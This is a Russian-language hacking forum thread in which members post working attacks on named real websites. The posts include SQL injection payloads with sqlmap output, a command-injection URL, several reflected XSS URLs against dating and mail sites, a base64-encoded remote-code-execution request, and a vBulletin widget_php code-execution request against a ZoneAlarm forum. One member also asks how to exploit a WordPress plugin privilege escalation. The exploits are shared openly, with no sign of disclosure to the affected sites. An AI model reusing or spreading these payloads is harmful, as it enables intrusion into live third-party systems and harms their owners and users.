Уязвимости SQLi, XSS и другие.

Discussion in 'Песочница' started by Егорыч+++, 10 May 2015.

  1. RWD

    RWD Member

    Joined:
    25 Apr 2013
    Messages:
    162
    Likes Received:
    40
    Reputations:
    2
    way.com
    Code:
    https://shuttle.way.com/waypanel/drivers/track-drivers-by-parking.php?pid=844
    Parameter: pid (GET)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: pid=844' AND 3141=3141 AND 'gxfZ'='gxfZ
    
        Type: AND/OR time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind
        Payload: pid=844' AND SLEEP(5) AND 'tJKn'='tJKn
    ---
    [INFO] the back-end DBMS is MySQL
    back-end DBMS: MySQL >= 5.0.12
    

    Code:
    http://www.alicetinting.com.au/pop.php?ID=37 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7178766271,(SELECT (ELT(8597=8597,1))),0x716a707171,0x78))s), 8446744073709551610, 8446744073709551610)))
     
    #321 RWD, 16 Mar 2019
    Last edited: 17 Mar 2019
    BenderMR likes this.
  2. BabaDook

    BabaDook Level 8

    Joined:
    9 May 2015
    Messages:
    1,041
    Likes Received:
    1,472
    Reputations:
    55
    upload_2019-5-6_1-12-16.png

    Выполнение системных команд
    https://www.dixongin.com/pages/weathermap.php/InterRAD?height=1|ls hacked&&width=260&zipcode=31749

    В файле zipcode
    нашёл
    01001,42.07,72.62
    01002,42.37,72.50
    01002,42.37,72.50
    01003,42.377017,72.51565
    01004,42.377017,72.51565
    01005,42.42,72.11
    01007,42.28,72.41
    01008,42.20,72.93
    01009,42.21,72.34
    01010,42.13,72.21
    01011,42.29,72.95
    01012,42.39,72.84
    01013,42.162046,72.607962
    01014,42.162046,72.607962
    01020,42.17,72.57
    01021,42.176443,72.576142
    01022,42.196672,72.558657
    01026,42.39,72.86
    01027,42.27,72.68
    01028,42.07,72.51
    01028,42.07,72.51
    01028,42.07,72.51
    01029,42.16,73.04
    01030,42.07,72.67
    01031,42.33,72.19
    01032,42.44,72.80
    01033,42.26,72.52
    01034,42.07,72.89
    01035,42.36,72.57
    01036,42.07,72.43
    01037,42.35,72.20
    01038,42.38,72.61
    01039,42.38,72.70
    01040,42.20,72.63
    01041,42.202007,72.626193
    01050,42.27,72.87
    01053,42.35,72.70
    01054,42.48,72.49
    01056,42.17,72.47
    И таких 420000 строк
    Заливался не я , я только нашёл.
     
    BenderMR and CyberTro1n like this.
  3. BabaDook

    BabaDook Level 8

    Joined:
    9 May 2015
    Messages:
    1,041
    Likes Received:
    1,472
    Reputations:
    55
    Octavian likes this.
  4. BabaDook

    BabaDook Level 8

    Joined:
    9 May 2015
    Messages:
    1,041
    Likes Received:
    1,472
    Reputations:
    55
  5. emperiance

    emperiance New Member

    Joined:
    22 May 2019
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    ребят, хелпми плиз! у меня есть страница на которой стоит 301 редирект. редирект срабатывает. в яндексе проверяю код ответа - 301. а в гугле -200. что это за магия и что с этим делать?
     
  6. BenderMR

    BenderMR Member

    Joined:
    23 Feb 2019
    Messages:
    67
    Likes Received:
    24
    Reputations:
    10
    Бандиты, подскажите как это дело эксплуатировать WordPress Contact Form 7 <= 5.0.3 - register_post_type() Privilege Escalation? Все ссылки с wpscan ничего толкового не дают.
    В инете способы эксплуатации тоже никак не представлены
     
  7. b3

    b3 Moderator

    Joined:
    5 Dec 2004
    Messages:
    1,976
    Likes Received:
    814
    Reputations:
    198
    _________________________
  8. BenderMR

    BenderMR Member

    Joined:
    23 Feb 2019
    Messages:
    67
    Likes Received:
    24
    Reputations:
    10
    Это все понятно. Я это первым делом прочитал. Но как имеенно создать новую форму? По какому пути эту POST дату отправлять?
    Cюда что ли напрямую site.com/wp-admin/post.php?
     
  9. crlf

    crlf Members of Antichat

    Joined:
    18 Mar 2016
    Messages:
    512
    Likes Received:
    921
    Reputations:
    317
    Code:
    https://temp-mail.org/en/?email="/onfocus='alert`lul`'/autofocus="@tmailcloud.net
    
     
    man474019, BabaDook, sysjuk and 5 others like this.
  10. Baskin-Robbins

    Baskin-Robbins Well-Known Member

    Joined:
    15 Sep 2018
    Messages:
    147
    Likes Received:
    424
    Reputations:
    31
    Reflected XSS :
    Code:
    http://bluesystem.info/love/?sortby=editor">[2]</a><script>alert("a")</script>
    
    Code:
    https://intimgirls.net/search/?priceMin="><script>alert(/a/.source)</script>
    
    Code:
    https://sextalk.ru/postlist.php?Board=help></a><script>alert("a");location.href = "https://sextalk.ru"</script
    
    Code:
    http://69-dating.com/search.php?sort=date"><script>alert(/a/.source)</script>&submit=%CD%E0%E9%F2%E8
    
     
    crlf and seostock like this.
  11. lifescore

    lifescore Elder - Старейшина

    Joined:
    27 Aug 2011
    Messages:
    605
    Likes Received:
    421
    Reputations:
    64
    rce (=

    шттп://www.t| u | torialspoint.com/

    [​IMG]


    Stat on similarweb =)

    [​IMG]



    PoC
    Code:
    from base64
    UE9TVCBodHRwczovL3RwY2cudHV0b3JpYWxzcG9pbnQuY29tL3RwY2cucGhwIEhUVFAvMS4xCkNvbnRlbnQtTGVuZ3RoOiA3MgpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZApIb3N0OiB0cGNnLnR1dG9yaWFsc3BvaW50LmNvbQoKbGFuZz1zaCZkZXZpY2U9JmNvZGU9LewmZXh0PXNoJmNvbXBpbGU9MCZleGVjdXRlPWVudiZtYWluZmlsZT1leGVjJnVpZD0x
    
     
    #331 lifescore, 4 Sep 2019
    Last edited: 4 Sep 2019
  12. Pop-Xlop

    Pop-Xlop Member

    Joined:
    26 Aug 2019
    Messages:
    8
    Likes Received:
    10
    Reputations:
    2
    ZoneAlarm
    Code:
    https://forums.zonealarm.com/ajax/render/widget_php
    POST:
    widgetConfig[code]=phpinfo();
    
     
  13. BabaDook

    BabaDook Level 8

    Joined:
    9 May 2015
    Messages:
    1,041
    Likes Received:
    1,472
    Reputations:
    55
    BenderMR likes this.
Loading...